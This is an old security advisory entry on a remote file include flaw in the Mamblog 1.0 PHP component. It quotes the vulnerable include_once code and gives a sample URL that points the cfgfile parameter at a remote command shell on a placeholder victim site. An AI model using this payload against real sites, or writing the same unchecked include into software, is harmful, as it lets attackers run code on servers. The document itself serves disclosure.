Mamblog 1.0 Version - Remote File Include Vulnerabilities

2006-06-13T00:00:00
ID SECURITYVULNS:DOC:13124
Type securityvulns
Reporter Securityvulns
Modified 2006-06-13T00:00:00

Description

SaVSaK.CoM | SpC-x - The-BeKiR |

Mamblog 1.0 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : Mamblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

$cfgfile = "$mosConfig_absolute_path/components/$option/configuration.php";

include_once( $cfgfile );

Vulnerable :

http://www.victim.com/Mamblog/admin.mamblog.php?cfgfile=Command-Shell